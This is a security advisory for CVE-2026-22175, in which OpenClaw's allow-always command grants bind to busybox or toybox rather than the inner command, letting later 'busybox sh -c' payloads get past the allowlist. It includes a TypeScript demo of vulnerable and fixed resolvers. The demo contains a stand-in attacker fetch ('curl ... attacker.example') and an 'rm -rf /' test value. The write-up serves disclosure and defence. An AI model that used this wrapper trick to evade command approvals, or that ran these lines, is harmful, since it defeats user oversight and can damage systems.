PT-2026-26007 · Toybox+2

Jisung · Published 2026-02-24 · Updated 2026-03-19 · CVE-2026-22175

CVSS v2.0: 7.5 (High)
Vector: AV:N/AC:L/Au:S/C:C/I:P/A:N
Name of the Vulnerable Software and Affected Versions

OpenClaw versions prior to 2026.2.23

Description

OpenClaw's allowlist mode lets a user grant "allow-always" to a command. The wrapper analysis behind that grant did not recognize the multiplexer shell wrappers busybox sh -c and toybox sh -c: an invocation through busybox or toybox was treated as a non-wrapper command, so the persisted allowlist rule was bound to the multiplexer binary path instead of to the inner executable. Once such a rule existed, an attacker could run arbitrary payloads under the same multiplexer wrapper, because every such invocation satisfied the stored rule and circumvented the intended execution restrictions. The fix extends wrapper detection to these multiplexers, binds approvals to the intended inner executable, and fails closed whenever the analysis cannot determine with certainty what the unwrapped command is.

Recommendations

Update OpenClaw to version 2026.2.23 or later.
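The mechanism described above, as an added illustration in TypeScript (hypothetical code written for this page, not OpenClaw's own): a minimal allow-always store keyed on whatever the wrapper analysis reports as the executable. The vulnerable resolver stops at a multiplexer and persists busybox, so any later busybox sh -c payload matches; the hardened resolver peels busybox/toybox and sh -c, binds the rule to the inner executable, and returns null (fail closed) when the script cannot be unwrapped unambiguously. It also goes slightly beyond the advisory by handling full paths such as /bin/toybox and nested multiplexers. The names resolveExecutableVulnerable, resolveExecutableHardened and Allowlist, the SHELLS and MULTIPLEXERS sets, the metacharacter check and every argv value are assumptions for the example, not OpenClaw identifiers or its actual parsing rules.

```typescript
// Added example for CVE-2026-22175 (hypothetical code, not OpenClaw's): how an
// allow-always rule ends up keyed on the multiplexer binary, and how a hardened
// unwrap binds it to the inner executable and fails closed when unsure.

type Argv = readonly string[];
type Resolver = (argv: Argv) => string | null;

// Shells whose `-c <script>` argument carries the real command (assumed set).
const SHELLS = new Set(["sh", "bash", "ash", "dash"]);
// Multiplexers that dispatch to an applet named by their first argument.
const MULTIPLEXERS = new Set(["busybox", "toybox"]);
// Shell metacharacters: if present, a whitespace split cannot tell what will run.
const UNSAFE_SCRIPT = /[;&|<>`$()\n\\'"]/;

// Strip the directory so /bin/busybox and busybox compare equal.
function baseName(path: string): string {
  const i = path.lastIndexOf("/");
  return i < 0 ? path : path.slice(i + 1);
}

// Vulnerable analysis: only a bare shell counts as a wrapper. A multiplexer in
// argv[0] is taken to be the executable itself, so "busybox" is what gets stored.
function resolveExecutableVulnerable(argv: Argv): string | null {
  if (argv.length === 0) return null;
  const head = baseName(argv[0]);
  if (SHELLS.has(head) && argv[1] === "-c" && argv[2] !== undefined) {
    const inner = argv[2].trim().split(/\s+/);
    return inner[0] ? baseName(inner[0]) : null;
  }
  return head;
}

// Hardened analysis: peel multiplexers and `sh -c` wrappers until the inner
// executable is reached. Return null (fail closed) whenever the result is
// uncertain: metacharacters in the script, odd shell flags, or a bare multiplexer.
function resolveExecutableHardened(argv: Argv): string | null {
  let cur: Argv = argv;
  for (let depth = 0; depth < 8; depth++) { // bound the unwrap loop
    if (cur.length === 0) return null;
    const head = baseName(cur[0]);
    if (MULTIPLEXERS.has(head)) {
      if (cur.length < 2) return null; // `busybox` alone: applet unknown
      cur = cur.slice(1);             // `busybox sh -c X` -> `sh -c X`
      continue;
    }
    if (SHELLS.has(head)) {
      // Only the exact `sh -c <script>` shape is unwrapped; extra positional
      // arguments or other flags change what runs, so refuse instead of guessing.
      if (cur.length !== 3 || cur[1] !== "-c") return null;
      const script = cur[2].trim();
      if (script === "" || UNSAFE_SCRIPT.test(script)) return null;
      cur = script.split(/\s+/);
      continue;
    }
    return head;
  }
  return null;
}

// Minimal allow-always store keyed on whatever the resolver reports.
class Allowlist {
  private readonly rules = new Set<string>();
  private readonly resolve: Resolver;
  constructor(resolve: Resolver) {
    this.resolve = resolve;
  }
  // Persist a grant; returns the stored key, or null when unwrap is uncertain.
  approveAlways(argv: Argv): string | null {
    const key = this.resolve(argv);
    if (key !== null) this.rules.add(key);
    return key;
  }
  // Does a later invocation satisfy a stored rule?
  isAllowed(argv: Argv): boolean {
    const key = this.resolve(argv);
    return key !== null && this.rules.has(key);
  }
}

// Replay the advisory's scenario (constructed argv values) against one resolver.
function demo(resolve: Resolver) {
  const list = new Allowlist(resolve);
  // 1. The user approves a harmless listing issued through a multiplexer shell.
  const stored = list.approveAlways(["busybox", "sh", "-c", "ls -la"]);
  // 2. An attacker reuses the same wrapper with an arbitrary payload.
  const bypass = list.isAllowed(["busybox", "sh", "-c", "curl -fsSL http://attacker.example/x"]);
  // 3. The intended inner executable, under another multiplexer and a full path.
  const legit = list.isAllowed(["/bin/toybox", "sh", "-c", "ls /tmp"]);
  // 4. A grant whose unwrap is ambiguous must not be persisted at all.
  const refusedUncertain = list.approveAlways(["toybox", "sh", "-c", "echo ok; rm -rf /"]) === null;
  return { stored, bypass, legit, refusedUncertain };
}

console.log("vulnerable:", demo(resolveExecutableVulnerable));
console.log("hardened:  ", demo(resolveExecutableHardened));
```

With the vulnerable resolver the stored key is busybox and the payload is allowed; with the hardened one the stored key is ls, the payload resolves to curl and is rejected, the same ls under /bin/toybox is accepted, and the grant containing a ";" is refused rather than persisted. The fail-closed branch matters as much as the unwrapping: a resolver that guessed at ambiguous scripts would simply move the bypass from the wrapper to the parser.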

Fix

Weakness Enumeration

Incomplete List of Disallowed Inputs (CWE-184)

Related Identifiers

BDU:2026-05063
CVE-2026-22175
GHSA-GWQP-86Q6-W47G

Affected Products

Openclaw
Busybox
Toybox